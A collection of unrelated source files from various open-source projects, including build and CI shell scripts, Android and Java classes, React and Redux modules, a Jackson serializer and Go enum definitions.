[ -e ./v2 ] || ln -s . v2
./dist/openapi-gen \
--go-header-file ${PROJECT_ROOT}/hack/custom-boilerplate.go.txt \
--input-dirs github.com/argoproj/argo-cd/v2/pkg/apis/application/${VERSION} \
--output-package github.com/argoproj/argo-cd/v2/pkg/apis/application/${VERSION} \
--report-filename pkg/apis/api-rules/violation_exceptions.list \
$@
[ -e ./v2 ] && rm -rf v2
export GO111MODULE=off
go build -o ./dist/gen-crd-spec ${PROJECT_ROOT}/hack/gen-crd-spec
./dist/gen-crd-spec
|
<reponame>matto1990/Kirin<filename>platforms/android/kirin-for-android/kirin-lib/src/main/java/com/futureplatforms/kirin/helpers/KirinScreenHelper.java<gh_stars>0
package com.futureplatforms.kirin.helpers;
import android.app.Activity;
import android.content.Intent;
import com.futureplatforms.kirin.extensions.IKirinExtension;
import com.futureplatforms.kirin.internal.core.IJsContext;
import com.futureplatforms.kirin.internal.core.IKirinState;
import com.futureplatforms.kirin.internal.core.INativeContext;
public class KirinScreenHelper extends KirinUiFragmentHelper {
public KirinScreenHelper(Activity nativeObject, String moduleName,
IJsContext jsContext, INativeContext nativeContext,
IKirinState appState) {
super(nativeObject, moduleName, jsContext, nativeContext, appState);
}
@Override
public void onResume(Object... args) {
getAppState().setActivity((Activity) getNativeObject());
super.onResume(args);
}
@Override
public void onPause() {
if (getAppState().getActivity() == getNativeObject()) {
getAppState().setActivity(null);
}
super.onPause();
}
/**
* This is called by the activity (by default for KirinActivity),
* and will extension that has launched another activity to get something (e.g. a login, taking a picture).
* @param requestCode
* @param resultCode
* @param data
*/
public void onActivityResult(int requestCode, int resultCode, Intent data) {
IKirinExtension extension = getAppState().getActiveExtension();
if (extension != null) {
extension.onActivityResult(requestCode, resultCode, data);
// TODO what happens if there is a chain of extensions?
getAppState().setActiveExtension(null);
}
}
}
|
<filename>silk-react-components/src/HierarchicalMapping/Mixins/Navigation.js
// import _ from 'lodash';
import hierarchicalMappingChannel from '../store';
const Navigation = {
// jumps to selected rule as new center of view
handleNavigate(id, parent, event) {
hierarchicalMappingChannel
.subject('ruleId.change')
.onNext({newRuleId: id, parentId: parent});
event.stopPropagation();
},
handleCreate(infoCreation) {
hierarchicalMappingChannel
.subject('mapping.create')
.onNext(infoCreation);
},
handleShowSuggestions(event) {
event.persist();
hierarchicalMappingChannel
.subject('mapping.showSuggestions')
.onNext(event);
},
handleToggleRuleDetails(stateExpand) {
hierarchicalMappingChannel
.subject('list.toggleDetails')
.onNext(stateExpand);
},
promoteToggleTreenavigation(stateVisibility) {
hierarchicalMappingChannel
.subject('treenav.toggleVisibility')
.onNext(stateVisibility);
},
};
export default Navigation;
|
<gh_stars>1-10
/*
* Copyright (c) 2011, <NAME>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* * Neither the name "TwelveMonkeys" nor the
* names of its contributors may be used to endorse or promote products
* derived from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
* A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
* CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
* EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
* PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
* PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
* LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
* NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
package com.twelvemonkeys.imageio.plugins.icns;
import com.twelvemonkeys.imageio.util.ImageReaderAbstractTest;
import org.junit.Ignore;
import org.junit.Test;
import javax.imageio.ImageReader;
import javax.imageio.spi.ImageReaderSpi;
import java.awt.*;
import java.io.IOException;
import java.util.Arrays;
import java.util.Collections;
import java.util.List;
/**
* ICNSImageReaderTest
*
* @author <a href="mailto:<EMAIL>"><NAME></a>
* @author last modified by $Author: haraldk$
* @version $Id: ICNSImageReaderTest.java,v 1.0 25.10.11 18:44 haraldk Exp$
*/
public class ICNSImageReaderTest extends ImageReaderAbstractTest {
@Override
protected List<TestData> getTestData() {
return Arrays.asList(
new TestData(
getClassLoaderResource("/icns/GenericJavaApp.icns"),
new Dimension(16, 16), // 1 bit + 1 bit mask
new Dimension(16, 16), new Dimension(16, 16), // 8 bit CMAP, 24 bit + 8 bit mask
new Dimension(32, 32), // 1 bit + 1 bit mask
new Dimension(32, 32), new Dimension(32, 32), // 8 bit CMAP, 24 bit + 8 bit mask
new Dimension(128, 128) // 24 bit + 8 bit mask
),
new TestData(
getClassLoaderResource("/icns/Apple Retro.icns"),
new Dimension(16, 16), // 24 bit + 8 bit mask
new Dimension(32, 32), // 24 bit + 8 bit mask
new Dimension(48, 48), // 24 bit + 8 bit mask
new Dimension(128, 128), // 24 bit + 8 bit mask
new Dimension(256, 256), // JPEG 2000 ic08
new Dimension(512, 512) // JPEG 2000 ic09
),
new TestData(
getClassLoaderResource("/icns/7zIcon.icns"), // Contains the icnV resource, that isn't an icon
new Dimension(16, 16), // 24 bit + 8 bit mask
new Dimension(32, 32), // 24 bit + 8 bit mask
new Dimension(128, 128), // 24 bit + 8 bit mask
new Dimension(256, 256), // JPEG 2000 ic08
new Dimension(512, 512) // JPEG 2000 ic09
),
new TestData(
getClassLoaderResource("/icns/appStore.icns"), // Contains the 'TOC ' and icnV resources + PNGs in ic08-10
new Dimension(16, 16), // 24 bit + 8 bit mask
new Dimension(32, 32), // 24 bit + 8 bit mask
new Dimension(128, 128), // 24 bit + 8 bit mask
new Dimension(256, 256), // PNG ic08
new Dimension(512, 512), // PNG ic09
new Dimension(1024, 1024) // PNG ic10
),
new TestData(
getClassLoaderResource("/icns/XLW.icns"), // No 8 bit mask for 16x16 & 32x32, fall back to 1 bit mask
new Dimension(16, 16), // 1 bit + 1 bit mask
new Dimension(16, 16), new Dimension(16, 16), // 4 bit CMAP, 8 bit CMAP (no 8 bit mask)
new Dimension(32, 32), // 1 bit + 1 bit mask
new Dimension(32, 32), new Dimension(32, 32), // 4 bit CMAP, 8 bit CMAP (no 8 bit mask)
new Dimension(128, 128) // 24 bit + 8 bit mask
),
new TestData(
getClassLoaderResource("/icns/XMLExport.icns"), // No masks at all, uncompressed 32 bit data
new Dimension(128, 128), // 32 bit interleaved
new Dimension(48, 48), // 32 bit interleaved
new Dimension(32, 32), // 32 bit interleaved
new Dimension(16, 16) // 32 bit interleaved
)
);
}
@Override
protected ImageReaderSpi createProvider() {
return new ICNSImageReaderSpi();
}
@Override
protected ImageReader createReader() {
return new ICNSImageReader();
}
@Override
protected Class getReaderClass() {
return ICNSImageReader.class;
}
@Override
protected List<String> getFormatNames() {
return Collections.singletonList("icns");
}
@Override
protected List<String> getSuffixes() {
return Collections.singletonList("icns");
}
@Override
protected List<String> getMIMETypes() {
return Collections.singletonList("image/x-apple-icons");
}
@Test
@Ignore("Known issue: Subsampled reading not supported")
@Override
public void testReadWithSubsampleParamPixels() throws IOException {
super.testReadWithSubsampleParamPixels();
}
@Test
@Ignore("Known issue: Source region reading not supported")
@Override
public void testReadWithSourceRegionParamEqualImage() throws IOException {
super.testReadWithSourceRegionParamEqualImage();
}
}
|
#!/bin/bash
#= Drop_File_Rename_Proper.sh
#
# Create Automator script Drop_File_Showpath.app using "Run Shell Script" and copy/paste there contents of this .sh file
function do_print {
echo "# Drop_File_Rename_Proper TYPE=$1 FILENAME='$2' "
}
for FILENAME in "$@" ; do
#
if [[ -d "${FILENAME}" ]]; then
do_print "d" "${FILENAME}"
elif [[ -f "${FILENAME}" ]]; then
do_print "f" "${FILENAME}"
else
do_print "?" "${FILENAME}"
fi ;
#
# break;
done ;
#-EOF
|
'use strict';
module.exports = {
administrative_area_level_1: 'administrative_area_level_1',
administrative_area_level_2: 'administrative_area_level_2',
administrative_area_level_3: 'administrative_area_level_3',
administrative_area_level_4: 'administrative_area_level_4',
administrative_area_level_5: 'administrative_area_level_5',
airport: 'airport',
bus_station: 'bus_station',
colloquial_area: 'colloquial_area',
country: 'country',
establishment: 'establishment',
floor: 'floor',
intersection: 'intersection',
locality: 'locality',
natural_feature: 'natural_feature',
neighborhood: 'neighborhood',
park: 'park',
parking: 'parking',
point_of_interest: 'point_of_interest',
political: 'political',
postal_code: 'postal_code',
postal_town: 'postal_town',
post_box: 'post_box',
premise: 'premise',
room: 'room',
route: 'route',
state: 'administrative_area_level_1',
street_address: 'street_address',
street_number: 'street_number',
sublocality: 'sublocality',
subpremise: 'subpremise',
suburb: 'locality',
train_station: 'train_station',
transit_station: 'transit_station',
unit: 'subpremise',
ward: 'ward',
};
|
# Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!/bin/bash
# GPU-related setting
gpu_id=0
gemm_file=../gemm/gemm.fp32.1080ti
#gemm_file=../gemm/gemm.fp16.1080ti
# Meta perameters
batch_size=8
seq_len=128
warm_up_ite=50
profile_ite=100
#Input
json_file=./xlnet_config.json
# Parameters for Fasterxlnet
run_mode=2 #FP32_TIME_TEST=2
#run_mode=0 #FP16_TIME_TEST=0
for seq_len in 32 #64 128
do
for batch_size in 1 8
do
# Run tensorflow xla to collect baseline
cm="python3 ../python/runProfile.py -s $seq_len -b $batch_size -w $warm_up_ite -t $profile_ite -j $json_file"
echo COMMAND: $cm
TF_XLA_FLAGS="--tf_xla_auto_jit=2" CUDA_VISIBLE_DEVICES=$gpu_id $cm
cm="../runTest -m $run_mode -g $gpu_id -e $gemm_file -s $seq_len -b $batch_size -w $warm_up_ite -t $profile_ite -j $json_file"
echo COMMAND: $cm
$cm
done
done
|
package libs.trustconnector.scdp.util.tlv.simpletlv;
import libs.trustconnector.scdp.util.tlv.*;
import libs.trustconnector.scdp.util.tlv.Length;
import libs.trustconnector.scdp.util.tlv.Tag;
public class BufferSize extends SimpleTLV
{
public BufferSize(final Tag tag, final Length len, final byte[] v, final int vOff) {
super(tag, len, v, vOff);
}
public BufferSize(final int size) {
super(57, size, 2);
}
public int getBufferSize() {
return this.value.getInt2(0);
}
@Override
public String toString() {
return String.format("Buffer Size=0x%04X", this.value.getInt2(0));
}
}
|
<reponame>machnicki/healthunlocked<gh_stars>0
import React from 'react';
import { Route } from 'react-router';
import App from './App';
import RepoPage from './pages/RepoPage';
import UserPage from './pages/UserPage';
export default (
<Route name='explore' path='/' handler={App}>
<Route name='repo' path='/:login/:name' handler={RepoPage} />
<Route name='user' path='/:login' handler={UserPage} />
</Route>
);
|
/*
* Copyright [2020-2030] [https://www.stylefeng.cn]
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
* Guns采用APACHE LICENSE 2.0开源协议,您在使用过程中,需要注意以下几点:
*
* 1.请不要删除和修改根目录下的LICENSE文件。
* 2.请不要删除和修改Guns源码头部的版权声明。
* 3.请保留源码和相关描述文件的项目出处,作者声明等。
* 4.分发源码时候,请注明软件出处 https://gitee.com/stylefeng/guns
* 5.在修改包名,模块名称,项目代码等时,请注明软件出处 https://gitee.com/stylefeng/guns
* 6.若您的项目无法满足以上几点,可申请商业授权
*/
package cn.stylefeng.roses.kernel.dict.api.serializer;
import cn.hutool.core.util.StrUtil;
import cn.stylefeng.roses.kernel.dict.api.context.DictContext;
import com.fasterxml.jackson.core.JsonGenerator;
import com.fasterxml.jackson.databind.JavaType;
import com.fasterxml.jackson.databind.JsonMappingException;
import com.fasterxml.jackson.databind.JsonNode;
import com.fasterxml.jackson.databind.SerializerProvider;
import com.fasterxml.jackson.databind.annotation.JacksonStdImpl;
import com.fasterxml.jackson.databind.jsonFormatVisitors.JsonFormatVisitorWrapper;
import com.fasterxml.jackson.databind.jsontype.TypeSerializer;
import com.fasterxml.jackson.databind.ser.std.StdScalarSerializer;
import java.io.IOException;
import java.lang.reflect.Type;
/**
* jackson 序列化获取字典名称
* <p>
* 使用注意事项:
* <p>
* 1.在pojo的字段上加 @JsonSerialize(using=DictValueSerializer.class)
* 2.pojo字段的返回值为:"字典类型编码|字典的编码"
*
* @author liuhanqing
* @date 2021/1/16 22:21
*/
@JacksonStdImpl
public final class DictValueSerializer extends StdScalarSerializer<Object> {
private static final long serialVersionUID = 1L;
/**
* 字典类型编码和字典值的分隔符
*/
private static final String SEPARATOR = "|";
/**
* 空值字符串
*/
private static final String NULL_STR = "null";
/**
* 字典值之前分隔符
*/
private static final String VALUE_SEPARATOR = ",";
public DictValueSerializer() {
super(String.class, false);
}
@Override
public boolean isEmpty(SerializerProvider prov, Object value) {
String str = (String) value;
return str.length() == 0;
}
@Override
public void serialize(Object value, JsonGenerator gen, SerializerProvider provider) throws IOException {
if (value == null) {
gen.writeNull();
return;
}
// 被序列化字段的值
String fieldValue = value.toString();
// 如果为空或者没有分隔符返回空串
if (StrUtil.isBlank(fieldValue) || !fieldValue.contains(SEPARATOR)) {
fieldValue = StrUtil.EMPTY;
gen.writeString(fieldValue);
return;
}
// 分隔需要序列化的值
String[] dictTypeCodeAndDictCode = fieldValue.split("\\|");
// 如果分割出来不是2,则格式不正确
if (dictTypeCodeAndDictCode.length != 2) {
fieldValue = StrUtil.EMPTY;
gen.writeString(fieldValue);
return;
}
// 获取字典类型编码和字典编码
String dictTypeCode = dictTypeCodeAndDictCode[0];
String dictCode = dictTypeCodeAndDictCode[1];
// 字典code为空,返回空串
if (StrUtil.isBlank(dictCode) || NULL_STR.equals(dictCode)) {
fieldValue = StrUtil.EMPTY;
gen.writeString(fieldValue);
return;
}
// 字典编码是多个,存在逗号分隔符
if (dictCode.contains(VALUE_SEPARATOR)) {
String[] dictCodeArray = dictCode.split(VALUE_SEPARATOR);
StringBuilder dictNames = new StringBuilder();
for (String singleDictCode : dictCodeArray) {
String dictName = DictContext.me().getDictName(dictTypeCode, singleDictCode);
if (StrUtil.isNotBlank(dictName)) {
dictNames.append(dictName).append(VALUE_SEPARATOR);
}
}
fieldValue = StrUtil.removeSuffix(dictNames.toString(), VALUE_SEPARATOR);
gen.writeString(fieldValue);
return;
}
// 字典编码是一个
fieldValue = DictContext.me().getDictName(dictTypeCode, dictCode);
gen.writeString(fieldValue);
}
@Override
public final void serializeWithType(Object value, JsonGenerator gen, SerializerProvider provider,
TypeSerializer typeSer) throws IOException {
// no type info, just regular serialization
gen.writeString((String) value);
}
@Override
public JsonNode getSchema(SerializerProvider provider, Type typeHint) {
return createSchemaNode("string", true);
}
@Override
public void acceptJsonFormatVisitor(JsonFormatVisitorWrapper visitor, JavaType typeHint) throws JsonMappingException {
visitStringFormat(visitor, typeHint);
}
}
|
#!/bin/bash
# This script is meant to be called by the "install" step defined in
# .travis.yml. See http://docs.travis-ci.com/ for more details.
# The behavior of the script is controlled by environment variabled defined
# in the .travis.yml in the top level folder of the project.
# License: 3-clause BSD
# Travis clone pydicom/pydicom repository in to a local repository.
set -e
export CC=/usr/lib/ccache/gcc
export CXX=/usr/lib/ccache/g++
# Useful for debugging how ccache is used
# export CCACHE_LOGFILE=/tmp/ccache.log
# ~60M is used by .ccache when compiling from scratch at the time of writing
ccache --max-size 100M --show-stats
# Deactivate the travis-provided virtual environment and setup a
# conda-based environment instead
deactivate
# Install miniconda
wget https://repo.continuum.io/miniconda/Miniconda3-latest-Linux-x86_64.sh \
-O miniconda.sh
MINICONDA_PATH=/home/travis/miniconda
chmod +x miniconda.sh && ./miniconda.sh -b -p $MINICONDA_PATH
export PATH=$MINICONDA_PATH/bin:$PATH
# Configure the conda environment and put it in the path using the
# provided versions
conda create -n testenv --yes python=$PYTHON_VERSION pip
source activate testenv
pip install --upgrade pip setuptools
echo "Installing numpy and scipy master wheels"
dev_url=https://7933911d6844c6c53a7d-47bd50c35cd79bd838daf386af554a83.ssl.cf2.rackcdn.com
pip install --pre --upgrade --timeout=60 -f $dev_url numpy scipy pandas cython
echo "Installing joblib master"
pip install https://github.com/joblib/joblib/archive/master.zip
if [[ "$OPTIONAL_DEPS" == "keras" ]]; then
conda install --yes keras tensorflow=1
KERAS_BACKEND=tensorflow
python -c "import keras.backend"
sed -i -e 's/"backend":[[:space:]]*"[^"]*/"backend":\ "'$KERAS_BACKEND'/g' ~/.keras/keras.json;
elif [[ "$OPTIONAL_DEPS" == "tensorflow" ]]; then
conda install --yes tensorflow
fi
pip install --pre --extra-index https://pypi.anaconda.org/scipy-wheels-nightly/simple scikit-learn
conda install --yes pytest pytest-cov
pip install codecov
pip install -U git+https://github.com/numpy/numpydoc.git
python --version
python -c "import numpy; print('numpy %s' % numpy.__version__)"
python -c "import scipy; print('scipy %s' % scipy.__version__)"
pip install -e .
ccache --show-stats
# Useful for debugging how ccache is used
# cat $CCACHE_LOGFILE
|
<filename>src/state/QueueSummaryState.js
import * as Constants from '../utils/Constants';
const ACTION_SET_FILTERS = "SET_FILTERS"; // Not used
const ACTION_SET_QUEUES = "SET_QUEUES";
const ACTION_SET_QUEUE_TASKS = "SET_QUEUE_TASKS";
const ACTION_HANDLE_TASK_UPDATED = "HANDLE_TASK_UPDATED";
const ACTION_HANDLE_TASK_REMOVED = "HANDLE_TASK_REMOVED";
const ACTION_SET_SELECTED_QUEUE = "SET_SELECTED_QUEUE"; // Not used
const ACTION_RECALCULATE_FILTERS = "RECALCULATE_FILTERS"; // Not used
const ACTION_SET_SELECTED_TASK = 'SET_SELECTED_TASK';
const ACTION_REMOVE_SELECTED_TASK = 'REMOVE_SELECTED_TASK';
const initialState = {
filters: [],
queues: undefined,
selectedQueueSid: undefined,
selectedTaskSid: undefined,
config: Constants.CONFIG
};
// Define plugin actions
export class Actions {
static setFilters = (filters) => ({
type: ACTION_SET_FILTERS,
filters
});
static setQueues = (queues) => ({
type: ACTION_SET_QUEUES,
queues
});
static setQueueTasks = (queueSid, tasks) => ({
type: ACTION_SET_QUEUE_TASKS,
payload: {
queueSid,
tasks
}
});
static handleTaskUpdated = (task) => ({
type: ACTION_HANDLE_TASK_UPDATED,
task
});
static handleTaskRemoved = (taskSid) => ({
type: ACTION_HANDLE_TASK_REMOVED,
taskSid
});
static setSelectedQueue = (selectedQueueSid) => ({
type: ACTION_SET_SELECTED_QUEUE,
selectedQueueSid
});
static setSelectedTask = (selectedTaskSid) => ({
type: ACTION_SET_SELECTED_TASK,
selectedTaskSid
});
static removeSelectedTask = () => ({
type: ACTION_REMOVE_SELECTED_TASK
});
static recalculateFilters = () => ({
type: ACTION_RECALCULATE_FILTERS
});
}
// Define how actions influence state
export function reduce(state = initialState, action) {
switch (action.type) {
case ACTION_SET_FILTERS:
return {
...state,
filters: action.filters,
};
case ACTION_SET_QUEUES:
return {
...state,
queues: action.queues,
};
case ACTION_SET_QUEUE_TASKS:
return {
...state,
queues: state.queues.map((item, index) => {
// Update the matching queue
if (item.queue_sid === action.payload.queueSid) {
return {
...item,
tasks: action.payload.tasks,
columnStats: getTaskStatsForColumns(action.payload.tasks, state.config)
}
}
// Non matching queues left untouched
return item;
}),
};
case ACTION_HANDLE_TASK_UPDATED:
return {
...state,
queues: state.queues.map(queue => {
if (queue.queue_name === action.task.queue_name) {
const copyOfTasks = [...queue.tasks];
const existingTaskIndex = copyOfTasks.findIndex(t => t.task_sid === action.task.task_sid);
if (existingTaskIndex < 0) {
copyOfTasks.push(action.task);
} else {
copyOfTasks[existingTaskIndex] = action.task;
}
return {
...queue,
tasks: copyOfTasks,
columnStats: getTaskStatsForColumns(copyOfTasks, state.config)
}
}
return queue;
}),
};
case ACTION_HANDLE_TASK_REMOVED:
return {
...state,
queues: state.queues.map(queue => {
const existingTaskIndex = queue.tasks.findIndex(t => t.task_sid === action.taskSid);
if (existingTaskIndex >= 0) {
const filteredTasks = queue.tasks.filter(task => task.task_sid !== action.taskSid);
return {
...queue,
tasks: filteredTasks,
columnStats: getTaskStatsForColumns(filteredTasks, state.config)
};
}
return queue;
}),
};
case ACTION_SET_SELECTED_QUEUE:
return {
...state,
selectedQueueSid: action.selectedQueueSid,
};
case ACTION_SET_SELECTED_TASK:
return {
...state,
selectedTaskSid: action.selectedTaskSid,
};
case ACTION_REMOVE_SELECTED_TASK:
return {
...state,
selectedTaskSid: undefined,
};
case ACTION_RECALCULATE_FILTERS:
return {
...state,
filters: {
...filters
}
};
default:
return state;
}
function getTaskStatsForColumns(tasks, config) {
const columns = config[Constants.CONFIG_QUEUE_TASK_COLUMNS];
// Go through columns array, and for each column (task attribute), build up a map of
// unique values and their respective stats (e.g. count, max age) - for display
const columnStats = columns.map((taskAttribute) => {
let columnStatsMap = new Map();
// Start with tasks that actually have this attribute.
// List is already sorted by age, so we know item 1 in any filtered list is the max age :)
const tasksWithAttribute = tasks.filter((task) => task.attributes[taskAttribute]);
// Now get the unique values
const uniqueValues = [...new Set(tasksWithAttribute.map(task => task.attributes[taskAttribute]))];
// Finally, iterate through each unique value and filter tasks to get count and max age, then
// populate map (then sort by highest values)
uniqueValues.forEach((taskAttributeValue) => {
const tasksByAttributeValue = tasksWithAttribute.filter((task) => task.attributes[taskAttribute] === taskAttributeValue);
const taskCount = tasksByAttributeValue.length;
const oldestDateCreated = tasksByAttributeValue[0].date_created;
const stats = {
taskCount: taskCount,
oldestDateCreated: oldestDateCreated
}
columnStatsMap.set(taskAttributeValue, stats);
});
const columnStatsMapDesc = new Map([...columnStatsMap.entries()].sort((a, b) => b.taskCount - a.tasksCount));
return columnStatsMapDesc;
});
return columnStats;
}
};
|
#!/usr/bin/env bash
set -e
set -x
echo "BRANCH_NAME=$BRANCH_NAME"
echo "the downward API labels are:"
cat /etc/podinfo/labels
# fix broken `BUILD_NUMBER` env var
export BUILD_NUMBER="$BUILD_ID"
JX_HOME="/tmp/jxhome"
KUBECONFIG="/tmp/jxhome/config"
# lets avoid the git/credentials causing confusion during the test
export XDG_CONFIG_HOME=$JX_HOME
mkdir -p $JX_HOME/git
jx --version
# replace the credentials file with a single user entry
echo "https://dev1:$GHE_ACCESS_TOKEN@github.beescloud.com" > $JX_HOME/git/credentials
gcloud auth activate-service-account --key-file $GKE_SA
# lets setup git
git config --global --add user.name JenkinsXBot
git config --global --add user.email jenkins-x@googlegroups.com
# Disable checking that the PipelineActivity has been updated by the build controller properly, since we're not using the build controller with static masters.
export BDD_DISABLE_PIPELINEACTIVITY_CHECK=true
echo "running the BDD tests with JX_HOME = $JX_HOME"
jx step bdd --use-revision --version-repo-pr --versions-repo https://github.com/jenkins-x/jenkins-x-versions.git --config jx/bdd/static/cluster.yaml --gopath /tmp --git-provider=ghe --git-provider-url=https://github.beescloud.com --git-username dev1 --git-api-token $GHE_ACCESS_TOKEN --default-admin-password $JENKINS_PASSWORD --no-delete-app --no-delete-repo --tests install --tests test-create-spring
|
#!/bin/bash -e
port="$1"
file="$2"
if [[ ! -w "$port" ]]; then
echo "Waiting for serial port to appear..."
while [[ ! -w "$port" ]]; do
true
done
else
echo "Resetting controller..."
rosrun drc_interface controller_tool --device=$port --reset
fi
avrdude -c avr109 -p atmega2560 -b 115200 -P "$port" -U flash:w:"$2"
|
<gh_stars>1-10
// Copyright © 2019 The Things Network Foundation, The Things Industries B.V.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package ttnpb
import (
"fmt"
"go.thethings.network/lorawan-stack/v3/pkg/i18n"
)
func defineEnum(e fmt.Stringer, message string) {
i18n.Define("enum:"+e.String(), message).SetSource(1)
}
func init() {
defineEnum(GrantType_GRANT_AUTHORIZATION_CODE, "authorization code")
defineEnum(GrantType_GRANT_PASSWORD, "username and password")
defineEnum(GrantType_GRANT_REFRESH_TOKEN, "refresh token")
defineEnum(State_STATE_REQUESTED, "requested and pending review")
defineEnum(State_STATE_APPROVED, "reviewed and approved")
defineEnum(State_STATE_REJECTED, "reviewed and rejected")
defineEnum(State_STATE_FLAGGED, "flagged and pending review")
defineEnum(State_STATE_SUSPENDED, "reviewed and suspended")
defineEnum(ContactType_CONTACT_TYPE_OTHER, "other")
defineEnum(ContactType_CONTACT_TYPE_ABUSE, "abuse")
defineEnum(ContactType_CONTACT_TYPE_BILLING, "billing")
defineEnum(ContactType_CONTACT_TYPE_TECHNICAL, "technical")
defineEnum(ContactMethod_CONTACT_METHOD_OTHER, "other")
defineEnum(ContactMethod_CONTACT_METHOD_EMAIL, "email")
defineEnum(ContactMethod_CONTACT_METHOD_PHONE, "phone")
defineEnum(MType_JOIN_REQUEST, "join request")
defineEnum(MType_JOIN_ACCEPT, "join accept")
defineEnum(MType_UNCONFIRMED_UP, "unconfirmed uplink")
defineEnum(MType_UNCONFIRMED_DOWN, "unconfirmed downlink")
defineEnum(MType_CONFIRMED_UP, "confirmed uplink")
defineEnum(MType_CONFIRMED_DOWN, "confirmed downlink")
defineEnum(MType_REJOIN_REQUEST, "rejoin request")
defineEnum(MType_PROPRIETARY, "proprietary")
defineEnum(JoinRequestType_REJOIN_CONTEXT, "rejoin to renew context")
defineEnum(JoinRequestType_REJOIN_SESSION, "rejoin to renew session")
defineEnum(JoinRequestType_REJOIN_KEYS, "rejoin to renew keys")
defineEnum(JoinRequestType_JOIN, "join")
defineEnum(RejoinRequestType_CONTEXT, "renew context")
defineEnum(RejoinRequestType_SESSION, "renew session")
defineEnum(RejoinRequestType_KEYS, "renew keys")
defineEnum(CFListType_FREQUENCIES, "frequencies")
defineEnum(CFListType_CHANNEL_MASKS, "channel masks")
defineEnum(MACCommandIdentifier_CID_RFU_0, "RFU")
defineEnum(MACCommandIdentifier_CID_RESET, "reset")
defineEnum(MACCommandIdentifier_CID_LINK_CHECK, "link check")
defineEnum(MACCommandIdentifier_CID_LINK_ADR, "adaptive data rate")
defineEnum(MACCommandIdentifier_CID_DUTY_CYCLE, "duty cycle")
defineEnum(MACCommandIdentifier_CID_RX_PARAM_SETUP, "receive parameters")
defineEnum(MACCommandIdentifier_CID_DEV_STATUS, "device status")
defineEnum(MACCommandIdentifier_CID_NEW_CHANNEL, "new channel")
defineEnum(MACCommandIdentifier_CID_RX_TIMING_SETUP, "receive timing")
defineEnum(MACCommandIdentifier_CID_TX_PARAM_SETUP, "transmit parameters")
defineEnum(MACCommandIdentifier_CID_DL_CHANNEL, "downlink channel")
defineEnum(MACCommandIdentifier_CID_REKEY, "rekey")
defineEnum(MACCommandIdentifier_CID_ADR_PARAM_SETUP, "adaptive data rate parameters")
defineEnum(MACCommandIdentifier_CID_DEVICE_TIME, "device time")
defineEnum(MACCommandIdentifier_CID_FORCE_REJOIN, "force rejoin")
defineEnum(MACCommandIdentifier_CID_REJOIN_PARAM_SETUP, "rejoin parameters")
defineEnum(MACCommandIdentifier_CID_PING_SLOT_INFO, "ping slot info")
defineEnum(MACCommandIdentifier_CID_PING_SLOT_CHANNEL, "ping slot channel")
defineEnum(MACCommandIdentifier_CID_BEACON_TIMING, "beacon timing")
defineEnum(MACCommandIdentifier_CID_BEACON_FREQ, "beacon frequency")
defineEnum(MACCommandIdentifier_CID_DEVICE_MODE, "device mode")
defineEnum(LocationSource_SOURCE_UNKNOWN, "unknown location source")
defineEnum(LocationSource_SOURCE_GPS, "determined by GPS")
defineEnum(LocationSource_SOURCE_REGISTRY, "set in and updated from a registry")
defineEnum(LocationSource_SOURCE_IP_GEOLOCATION, "estimated with IP geolocation")
defineEnum(LocationSource_SOURCE_WIFI_RSSI_GEOLOCATION, "estimated with WiFi RSSI geolocation")
defineEnum(LocationSource_SOURCE_BT_RSSI_GEOLOCATION, "estimated with Bluetooth RSSI geolocation")
defineEnum(LocationSource_SOURCE_LORA_RSSI_GEOLOCATION, "estimated with LoRa RSSI geolocation")
defineEnum(LocationSource_SOURCE_LORA_TDOA_GEOLOCATION, "estimated with LoRa TDOA geolocation")
defineEnum(LocationSource_SOURCE_COMBINED_GEOLOCATION, "estimated by a combination of geolocation sources")
defineEnum(PayloadFormatter_FORMATTER_NONE, "no formatter")
defineEnum(PayloadFormatter_FORMATTER_REPOSITORY, "defined by end device type repository")
defineEnum(PayloadFormatter_FORMATTER_GRPC_SERVICE, "gRPC service")
defineEnum(PayloadFormatter_FORMATTER_JAVASCRIPT, "JavaScript")
defineEnum(PayloadFormatter_FORMATTER_CAYENNELPP, "Cayenne LPP")
